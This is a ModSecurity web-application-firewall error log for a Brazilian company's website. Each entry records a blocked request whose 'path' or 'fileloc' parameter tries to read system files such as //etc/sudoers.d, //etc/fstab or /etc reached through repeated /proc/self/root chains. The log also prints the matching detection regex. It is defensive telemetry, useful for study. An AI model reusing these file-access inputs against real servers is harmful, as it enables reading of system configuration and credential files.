[Fri Mar 20 11:32:24.963622 2026] [:error] [pid 7235:tid 140411658000128] [client 216.73.216.191:43978] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aePqxLDW4GITHUkQYHwAAAQo"]
[Fri Mar 20 11:32:25.067172 2026] [:error] [pid 21219:tid 140411590858496] [client 216.73.216.191:44052] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aefXLqtnMIWvjpaLI8wAAApI"]
[Fri Mar 20 11:32:25.370463 2026] [:error] [pid 15826:tid 140411699963648] [client 216.73.216.191:44070] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aeeoXxyEfFpUF8f-tywAAAUU"]
[Fri Mar 20 11:32:25.592076 2026] [:error] [pid 26799:tid 140411607643904] [client 216.73.216.191:44076] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aeda6ubjKNq_cu4YJdgAAA1A"]
[Fri Mar 20 11:32:25.811337 2026] [:error] [pid 9818:tid 140411649607424] [client 216.73.216.191:44092] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aeV1pVZ5mVmJwsFNcnQAAAEs"]
[Fri Mar 20 11:32:26.246110 2026] [:error] [pid 9818:tid 140411616036608] [client 216.73.216.191:44126] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ael1pVZ5mVmJwsFNcnwAAAE8"]
[Fri Mar 20 11:32:26.476166 2026] [:error] [pid 10189:tid 140411641214720] [client 216.73.216.191:44136] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aejJ3M9BSuKP7CAZVSAAAAIw"]
[Fri Mar 20 11:32:26.555225 2026] [:error] [pid 7893:tid 140411565680384] [client 216.73.216.191:44146] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aehCii7xarUs8iHaYUwAAAhU"]
[Fri Mar 20 11:32:27.257851 2026] [:error] [pid 7893:tid 140411741927168] [client 216.73.216.191:44182] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aexCii7xarUs8iHaYVQAAAgA"]
[Fri Mar 20 11:32:27.348465 2026] [:error] [pid 15826:tid 140411741927168] [client 216.73.216.191:44190] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ae-oXxyEfFpUF8f-tzQAAAUA"]
[Fri Mar 20 11:32:27.585229 2026] [:error] [pid 21219:tid 140411540502272] [client 216.73.216.191:44206] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ae_XLqtnMIWvjpaLI9QAAApg"]
[Fri Mar 20 11:32:27.880473 2026] [:error] [pid 9818:tid 140411683178240] [client 216.73.216.191:44222] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ae11pVZ5mVmJwsFNcpAAAAEc"]
[Fri Mar 20 11:32:27.904080 2026] [:error] [pid 15826:tid 140411565680384] [client 216.73.216.191:44226] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ae-oXxyEfFpUF8f-tzgAAAVU"]
[Fri Mar 20 11:32:27.959226 2026] [:error] [pid 7893:tid 140411699963648] [client 216.73.216.191:44232] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1aexCii7xarUs8iHaYVgAAAgU"]
[Fri Mar 20 11:32:29.475899 2026] [:error] [pid 11642:tid 140411683178240] [client 216.73.216.191:44256] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1afLninkcc-iUj5AqK1gAAA4c"]
[Fri Mar 20 11:32:42.936160 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.38:45168] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1aigF0L0L-SsrnPo6XdQAAAs4"]
[Fri Mar 20 11:32:43.282354 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.106:45192] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1aizJ3M9BSuKP7CAZVagAAAJQ"]
[Fri Mar 20 11:32:45.475467 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:50486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ajQF0L0L-SsrnPo6XewAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:32:47.651168 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.241.31:53030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ajwF0L0L-SsrnPo6XgQAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/run/initramfs/state/etc
[Fri Mar 20 11:32:50.035402 2026] [:error] [pid 7235:tid 140411599251200] [client 216.73.216.191:45668] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1akvqxLDW4GITHUkQYMAAAARE"]
[Fri Mar 20 11:32:50.833079 2026] [:error] [pid 21219:tid 140411716749056] [client 216.73.216.191:45730] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1akvXLqtnMIWvjpaLJGgAAAoM"]
[Fri Mar 20 11:32:51.767160 2026] [:error] [pid 15826:tid 140411716749056] [client 216.73.216.191:45736] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1ak-oXxyEfFpUF8f-t3gAAAUM"]
[Fri Mar 20 11:32:53.324051 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:45834] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1alAF0L0L-SsrnPo6XhwAAAs0"]
[Fri Mar 20 11:32:53.326314 2026] [:error] [pid 21219:tid 140411708356352] [client 216.73.216.191:45838] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1alPXLqtnMIWvjpaLJHwAAAoQ"]
[Fri Mar 20 11:32:55.368593 2026] [:error] [pid 11642:tid 140411725141760] [client 216.73.216.191:45988] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1al7ninkcc-iUj5AqK8gAAA4I"]
[Fri Mar 20 11:32:55.880021 2026] [:error] [pid 7893:tid 140411649607424] [client 216.73.216.191:46018] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1alxCii7xarUs8iHaYjAAAAgs"]
[Fri Mar 20 11:32:58.364390 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:37244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1amda6ubjKNq_cu4YJtwAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:32:59.527198 2026] [:error] [pid 10189:tid 140411708356352] [client 216.73.216.191:46234] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1amzJ3M9BSuKP7CAZVhgAAAIQ"]
